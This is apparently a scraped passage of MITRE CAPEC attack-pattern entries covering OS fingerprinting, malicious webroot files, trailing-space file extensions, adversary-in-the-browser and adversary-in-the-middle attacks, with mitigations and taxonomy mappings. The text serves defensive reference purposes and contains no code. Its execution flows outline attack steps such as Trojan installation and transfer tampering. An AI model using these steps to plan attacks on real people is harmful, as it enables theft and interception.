ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	103	Clickjacking
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	501	Android Activity Hijack
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	504	Task Impersonation
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	506	Tapjacking

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

The adversary must convince the victim into performing the decoy action.

The adversary must have the means to control a user's interface to present them with a decoy action as well as the actual malicious action. Simple versions of this attack can be performed using web pages requiring only that the adversary be able to host (or control) content that the user visits.

Consequences

Scope	Impact	Likelihood
Confidentiality Integrity Availability	Other

Mitigations

Avoid interacting with suspicious sites or clicking suspicious links.

An organization should provide regular, robust cybersecurity training to its employees.

Related Weaknesses

CWE-ID	Weakness Name
451	User Interface (UI) Misrepresentation of Critical Information

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Mitigations
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Related_Weaknesses

CAPEC-312: Active OS Fingerprinting

Attack Pattern ID: 312

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	224	Fingerprinting
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	317	IP ID Sequencing Probe
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	318	IP 'ID' Echoed Byte-Order Probe
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	319	IP (DF) 'Don't Fragment Bit' Echoing Probe
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	320	TCP Timestamp Probe
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	321	TCP Sequence Number Probe
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	322	TCP (ISN) Greatest Common Divisor Probe
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	323	TCP (ISN) Counter Rate Probe
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	324	TCP (ISN) Sequence Predictability Probe
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	325	TCP Congestion Control Flag (ECN) Probe
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	326	TCP Initial Window Size Probe
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	327	TCP Options Probe
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	328	TCP 'RST' Flag Checksum Probe
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	329	ICMP Error Message Quoting Probe
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	330	ICMP Error Message Echoing Integrity Probe
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	331	ICMP IP Total Length Field Probe
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	332	ICMP IP 'ID' Field Error Message Probe

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card.

Resources Required

Any type of active probing that involves non-standard packet headers requires the use of raw sockets, which is not available on particular operating systems (Microsoft Windows XP SP 2, for example). Raw socket manipulation on Unix/Linux requires root privileges.

A tool capable of sending and receiving packets from a remote system.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Confidentiality Access Control Authorization	Hide Activities

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1082	System Information Discovery

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pg. 56. 6th Edition. McGraw Hill. 2009.

[REF-128] Defense Advanced Research Projects Agency Information Processing Techniques Office and Information Sciences Institute University of Southern California. "RFC793 - Transmission Control Protocol". Defense Advanced Research Projects Agency (DARPA). 1981-09. <http://www.faqs.org/rfcs/rfc793.html>.

[REF-212] Gordon "Fyodor" Lyon. "Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning". Chapter 8. Remote OS Detection. 3rd "Zero Day" Edition,. Insecure.com LLC. 2008.

[REF-130] Gordon "Fyodor" Lyon. "The Art of Port Scanning". Volume: 7, Issue. 51. Phrack Magazine. 1997. <http://phrack.org/issues/51/11.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References, Related_Weaknesses

CAPEC-563: Add Malicious File to Shared Webroot

Attack Pattern ID: 563

Abstraction: Detailed

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	17	Using Malicious Files

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Mitigations

Ensure proper permissions on directories that are accessible through a web server. Disallow remote access to the web root. Disable execution on directories within the web root. Ensure that permissions of the web server process are only what is required by not using built-in accounts and instead create specific accounts to limit unnecessary access or permissions overlap across multiple systems.

Related Weaknesses

CWE-ID	Weakness Name
284	Improper Access Control

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Taxonomy_Mappings

CAPEC-649: Adding a Space to a File Extension

Attack Pattern ID: 649

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	635	Alternative Execution Due to Deceptive Filenames

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate System Resources

Prerequisites

The use of the file must be controlled by the file extension.

Consequences

Scope	Impact	Likelihood
Confidentiality Integrity Availability	Execute Unauthorized Commands

Mitigations

File extensions should be checked to see if non-visible characters are being included.

Related Weaknesses

CWE-ID	Weakness Name
46	Path Equivalence: 'filename ' (Trailing Space)

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1036.006	Masquerading:Space after Filename

Content History

Submissions
Submission Date	Submitter	Organization
2018-05-31 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2018-05-31 (Version 2.11)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Taxonomy_Mappings

CAPEC-662: Adversary in the Browser (AiTB)

Attack Pattern ID: 662

Abstraction: Standard

View customized information:

Description

An adversary exploits security vulnerabilities or inherent functionalities of a web browser, in order to manipulate traffic between two endpoints.

Extended Description

This attack first requires the adversary to trick the victim into installing a Trojan Horse application on their system, such as a malicious web browser plugin, which the adversary then leverages to mount the attack. The victim interacts with a web application, such as a banking website, in a normal manner and under the assumption that the connection is secure. However, the adversary can now alter and/or reroute traffic between the client application (e.g., web browser) and the coinciding endpoint, while simultaneously displaying intended transactions and data back to the user. The adversary may also be able to glean cookies, HTTP sessions, and SSL client certificates, which can be used to pivot into an authenticated intranet. Identifying AITB is often difficult because these attacks are successful even when security mechanisms such as SSL/PKI and multifactor authentication are present, since they still function as intended during the attack.

Alternate Terms

Term: Man in the Browser

Term: Boy in the Browser

Term: Man in the Mobile

Likelihood Of Attack

High

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	94	Adversary in the Middle (AiTM)
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	185	Malicious Software Download
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	542	Targeted Malware

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Subvert Access Control

Execution Flow

Experiment

The adversary tricks the victim into installing the Trojan Horse malware onto their system.
Techniques
Conduct phishing attacks, drive-by malware installations, or masquerade malicious browser extensions as being legitimate.
The adversary inserts themself into the communication channel initially acting as a routing proxy between the two targeted components.

Exploit

The adversary observes, filters, or alters passed data of their choosing to gain access to sensitive information or to manipulate the actions of the two target components for their own purposes.

Prerequisites

The adversary must install or convince a user to install a Trojan.

There are two components communicating with each other.

An attacker is able to identify the nature and mechanism of communication between the two target components.

Strong mutual authentication is not used between the two target components yielding opportunity for adversarial interposition.

For browser pivoting, the SeDebugPrivilege and a high-integrity process must both exist to execute this attack.

Skills Required

[Level: Medium]

Tricking the victim into installing the Trojan is often the most difficult aspect of this attack. Afterwards, the remainder of this attack is fairly trivial.

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data
Confidentiality Access Control Authorization	Gain Privileges
Confidentiality	Read Data

Mitigations

Ensure software and applications are only downloaded from legitimate and reputable sources, in addition to conducting integrity checks on the downloaded component.

Leverage anti-malware tools, which can detect Trojan Horse malware.

Use strong, out-of-band mutual authentication to always fully authenticate both ends of any communications channel.

Limit user permissions to prevent browser pivoting.

Ensure browser sessions are regularly terminated and when their effective lifetime ends.

Example Instances

An adversary conducts a phishing attack and tricks a victim into installing a malicious browser plugin. The adversary then positions themself between the victim and their banking institution. The victim begins by initiating a funds transfer from their personal savings to their personal checking account. Using injected JavaScript, the adversary captures this request and modifies it to transfer an increased amount of funds to an account that they controls, before sending it to the bank. The bank processes the transfer and sends the confirmation notice back to the victim, which is instead intercepted by the adversary. The adversary modifies the confirmation to reflect the original transaction details and sends this modified message back to the victim. Upon receiving the confirmation, the victim assumes the transfer was successful and is unaware that their money has just been transferred to the adversary.

In 2020, the Agent Tesla malware was leveraged to conduct AiTB attacks against organizations within the gas, oil, and other energy sectors. The malware was delivered via a spearphishing campaign and has the capability to form-grab, keylog, copy clipboard data, extract credentials, and capture screenshots. [REF-630]

Boy in the browser attacks are a subset of AiTB attacks. Similar to AiTB attacks, the adversary must first trick the victim into installing a Trojan, either via social engineering or drive-by-download attacks. The malware then modifies the victim's "hosts" file in order to reroute web traffic from an intended website to an adversary-controlled website that mimics the legitimate website. The adversary is now able to observe, intercept, and/or modify all traffic, as in a traditional Adversary in the Middle attack (CAPEC-94). BiTB attacks are low-cost, easy to execute, and more difficult to detect since the malware often removes itself once the attack has concluded. [REF-631]

Man in the Mobile attacks are a subset of AiTB attacks that target mobile device users. Like AiTB attacks, an adversary convinces a victim to install a Trojan mobile application on their mobile device, often under the guise of security. Once the victim has installed the application, the adversary can capture all SMS traffic to bypass SMS-based out-of-band authentication systems. [REF-632]

Related Weaknesses

CWE-ID	Weakness Name
300	Channel Accessible by Non-Endpoint
494	Download of Code Without Integrity Check

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1185	Man in the Browser

Relevant to the OWASP taxonomy mapping

Entry Name
Man-in-the-browser attack

References

[REF-629] "Man-in-the-browser attack". Open Web Application Security Project (OWASP). <https://owasp.org/www-community/attacks/Man-in-the-browser_attack>. URL validated: 2021-02-09.

[REF-630] Liviu Arsene. "Oil and Gas Spearphishing Campaigns Drop Agent Tesla Spyware in Advance of Historic OPEC+ Deal". Bitdefender Labs. 2020-04-21. <https://labs.bitdefender.com/2020/04/oil-gas-spearphishing-campaigns-drop-agent-tesla-spyware-in-advance-of-historic-opec-deal/>. URL validated: 2021-02-09.

[REF-631] Amit Klein. "Man-in-the-Mobile Attacks Single Out Android". SecurityIntelligence. 2012-07-10. <https://securityintelligence.com/man-in-the-mobile-attacks-single-out-android/>. URL validated: 2021-02-10.

[REF-632] Kelly Jackson Higgins. "New 'Boy In The Browser' Attacks On The Rise". Dark Reading, Informa PLC. 2011-02-14. <https://www.darkreading.com/risk/new-boy-in-the-browser-attacks-on-the-rise/d/d-id/1135247>. URL validated: 2021-02-10.

Content History

Submissions
Submission Date	Submitter	Organization
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)
Modifications
Modification Date	Modifier	Organization
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Description, Extended_Description

CAPEC-94: Adversary in the Middle (AiTM)

Attack Pattern ID: 94

Abstraction: Meta

View customized information:

Description

Extended Description

Whenever one component attempts to communicate with the other (data flow, authentication challenges, etc.), the data first flows through the adversary, who has the opportunity to observe or alter it, before being passed on to the intended recipient as if it was never observed. This interposition is transparent leaving the two compromised components unaware of the potential corruption or leakage of their communications. The potential for these attacks yields an implicit lack of trust in communication or identify between two components.

These attacks differ from Sniffing Attacks (CAPEC-157) since these attacks often modify the communications prior to delivering it to the intended recipient.

Alternate Terms

Term: Man-in-the-Middle / MITM

Term: Person-in-the-Middle / PiTM

Term: Monkey-in-the-Middle

Term: Monster-in-the-Middle

Term: On-path Attacker

Likelihood Of Attack

High

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	219	XML Routing Detour Attacks
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	384	Application API Message Manipulation via Man-in-the-Middle
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	386	Application API Navigation Remapping
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	466	Leveraging Active Adversary in the Middle Attacks to Bypass Same Origin Policy
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	662	Adversary in the Browser (AiTB)
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	701	Browser in the Middle (BiTM)
CanFollow	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	216	Communication Channel Manipulation
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	383	Harvesting Information via API Event Monitoring
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	697	DHCP Spoofing
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	151	Identity Spoofing
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	668	Key Negotiation of Bluetooth Attack (KNOB)
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	271	Schema Poisoning

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Subvert Access Control

Execution Flow

Explore

Determine Communication Mechanism: The adversary determines the nature and mechanism of communication between two components, looking for opportunities to exploit.
Techniques
Perform a sniffing attack and observe communication to determine a communication protocol.
Look for application documentation that might describe a communication mechanism used by a target.

Experiment

Position In Between Targets: The adversary inserts themself into the communication channel initially acting as a routing proxy between the two targeted components.

Techniques
Install spyware on a client that will intercept outgoing packets and route them to their destination as well as route incoming packets back to the client.
Exploit a weakness in an encrypted communication mechanism to gain access to traffic. Look for outdated mechanisms such as SSL.

Exploit

Use Intercepted Data Maliciously: The adversary observes, filters, or alters passed data of its choosing to gain access to sensitive information or to manipulate the actions of the two target components for their own purposes.
Techniques
Prevent some messages from reaching their destination, causing a denial of service.

Prerequisites

There are two components communicating with each other.

An attacker is able to identify the nature and mechanism of communication between the two target components.

An attacker can eavesdrop on the communication between the target components.

Strong mutual authentication is not used between the two target components yielding opportunity for attacker interposition.

The communication occurs in clear (not encrypted) or with insufficient and spoofable encryption.

Skills Required

[Level: Medium]

This attack can get sophisticated since the attack may use cryptography.

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data
Confidentiality Access Control Authorization	Gain Privileges
Confidentiality	Read Data

Mitigations

Ensure Public Keys are signed by a Certificate Authority

Encrypt communications using cryptography (e.g., SSL/TLS)

Use Strong mutual authentication to always fully authenticate both ends of any communications channel.

Exchange public keys using a secure channel

Example Instances

In 2017, security researcher Jerry Decime discovered that Equifax mobile applications were not leveraging HTTPS in all areas. Although authentication was properly utilizing HTTPS, in addition to validating the root of trust of the server certificate, other areas of the application were using HTTP to communicate. Adversaries could then conduct MITM attacks on rogue WiFi or cellular networks and hijack the UX. This further allowed the adversaries to prompt users for sensitive data, which could then be obtained in the plaintext response. [REF-636]

Related Weaknesses

CWE-ID	Weakness Name
300	Channel Accessible by Non-Endpoint
290	Authentication Bypass by Spoofing
593	Authentication Bypass: OpenSSL CTX Object Modified after SSL Objects are Created
287	Improper Authentication
294	Authentication Bypass by Capture-replay

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1557	Adversary-in-the-Middle

Relevant to the OWASP taxonomy mapping

Entry Name
Man-in-the-middle attack

References

[REF-553] M. Bishop. "Computer Security: Art and Science". Addison-Wesley. 2003.

[REF-633] "Man-in-the-middle attack". Open Web Application Security Project (OWASP). <https://owasp.org/www-community/attacks/Man-in-the-middle_attack>. URL validated: 2021-02-10.

[REF-634] Kyle Chivers. "What is a man-in-the-middle attack?". NortonLifeLock Inc.. 2020-03-26. <https://us.norton.com/internetsecurity-wifi-what-is-a-man-in-the-middle-attack.html>. URL validated: 2021-02-10.

[REF-635] "Man in the middle (MITM) attack". Imperva. <https://www.imperva.com/learn/application-security/man-in-the-middle-attack-mitm/>. URL validated: 2021-02-10.

[REF-636] Jerry Decime. "Settling the score: taking down the Equifax mobile application". 2017-09-13. <https://www.linkedin.com/pulse/settling-score-taking-down-equifax-mobile-application-jerry-decime/>. URL validated: 2021-02-10.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Examples-Instances, Related_Vulnerabilities
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Example_Instances, Related_Attack_Patterns, Taxonomy_Mappings
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated @Abstraction, Description, Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Description, Example_Instances, Execution_Flow, Taxonomy_Mappings
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Related_Attack_Patterns, Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated @Name, @Status, Alternate_Terms, Description, Example_Instances, Execution_Flow, Mitigations, References, Related_Attack_Patterns, Related_Weaknesses, Taxonomy_Mappings
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
